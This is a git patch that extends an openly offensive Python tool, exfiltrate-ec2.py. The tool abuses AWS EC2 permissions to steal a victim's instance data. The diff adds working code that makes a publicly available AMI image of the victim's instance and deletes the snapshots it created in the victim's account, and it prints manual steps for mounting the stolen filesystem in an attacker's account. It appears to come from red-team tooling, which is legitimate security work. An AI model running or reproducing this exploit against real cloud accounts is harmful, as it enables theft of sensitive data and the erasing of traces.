From 5c58f333cb85c8b99f9bce64d58f4dc50c91aace Mon Sep 17 00:00:00 2001 From: mgeeky Date: Thu, 5 Dec 2019 11:24:49 +0100 Subject: [PATCH] Enhanced exfiltrate-ec2.py a bit --- clouds/aws/exfiltrate-ec2.py | 59 +++++++++++++++++++++++++++--------- 1 file changed, 45 insertions(+), 14 deletions(-) diff --git a/clouds/aws/exfiltrate-ec2.py b/clouds/aws/exfiltrate-ec2.py index 6d91703..aa425d2 100644 --- a/clouds/aws/exfiltrate-ec2.py +++ b/clouds/aws/exfiltrate-ec2.py @@ -22,7 +22,7 @@ # Abuses: # ec2:CreateImage # -# NOT IMPLEMENTED YET. +# NOT FULLY IMPLEMENTED YET. # For this technique, the procedure is following - the script will create an image out of specified victim's EC2 # instance. This image will become publicly available (caution with client sensitive data!). After that, the script # will attempt to create/import public SSH RSA keys to the attacker's account and then create an EC2 instance using that @@ -277,6 +277,13 @@ class ExfiltrateEC2: else: Logger.fail(f"ec2:AttachVolume action on Attacker failed. Exception: {e}") + try: + Logger.out(f"Cleanup. Trying to remove created snapshot ({snapshot['SnapshotId']}) at Victim's estate...") + victim_client.delete_snapshot(SnapshotId = snapshot['SnapshotId']) + Logger.ok(f"Snapshot removed.") + except Exception as e: + Logger.fail(f"(That's ok) ec2:DeleteSnapshot action on Victim failed. Exception: {e}") + ssh_command = 'SSH to the attacker\'s EC2 instance\n' if attacker_instance_data: try: @@ -328,17 +335,21 @@ To examine exfiltrated data: ''') return True - def create_image(self, instance_id): - # Step 1: Create image: - # client.create_image( - # InstanceId = "", - # Name = "some name", - # Description = "some description" - # ) - # Returns: - # { - # "ImageId" : "ami-00000000" - # } + def create_image(self, instance_id, image_name, image_description): + victim_client = self.session['victim'].client('ec2') + attacker_client = self.session['attacker'].client('ec2') + + created_image = None + try: + Logger.out("Step 1: Creating a publicly available AMI image out of specified EC2 instance.") + created_image = victim_client.create_image( + InstanceId = instance_id, + Name = image_name, + Description = image_description + ) + Logger.ok(f"AMI Image with name: ({image_name}) created: {created_image['ImageId']}") + except Exception as e: + Logger.fatal(f"ec2:CreateImage action on Victim failed. Exception: {e}") # Step 2: Import custom SSH RSA public key # client.import_key_pair( @@ -369,7 +380,25 @@ To examine exfiltrated data: # # $ ssh ec2-user@1.2.3.4 # $ ls -l - Logger.fatal("NOT IMPLEMENTED YET.") + + print(f""" +=============================================================== +[!] REST OF THE EXPLOIT LOGIC HAS NOT BEEN IMPLEMENTED YET. +=============================================================== + +[.] You can proceed manually from this point: + + 1) Create an EC2 instance in region: {self.region} + + 2) Make sure this EC2 instance is being created out of public AMI image with ID: + Image ID: {created_image['ImageId']} + + 3) Setup SSH keys, Security Groups, etc. + + 4) SSH into that machine. + +Created EC2 instance's filesystem will be filled with files coming from the exfiltrated EC2. +""") def parseOptions(argv): global config @@ -408,6 +437,8 @@ def parseOptions(argv): ' This AMI image will then be shared with another AWS account, constituing exfiltration opportunity.' createimage = subparsers.add_parser('createimage', help = a) createimage.add_argument('--instance-id', help = '(Required) Specifies instance id (i-...) to create an image of.') + createimage.add_argument('--image-name', default = "Exfiltrated AMI image", type=str, help = '(Optional) Specifies a name for newly created AMI image. Default: "Exfiltrated AMI image"') + createimage.add_argument('--image-desc', default = "Exfiltrated AMI image", type=str, help = '(Optional) Specifies a description for newly created AMI image. Default: "Exfiltrated AMI image"') b = 'Creates a snapshot of an EBS volume used by an EC2 instance.'\ ' This snapshot will then be shared with another AWS account, constituing exfiltration opportunity.' @@ -508,7 +539,7 @@ def main(argv): if opts.method == 'createimage': Logger.info("Abusing ec2:CreateImage...") - exp.create_image(opts.instance_id) + exp.create_image(opts.instance_id, opts.image_name, opts.image_desc) elif opts.method == 'createsnapshot': Logger.out("Abusing dangerous ec2:CreateSnapshot and ec2:ModifySnapshotAttribute...\n")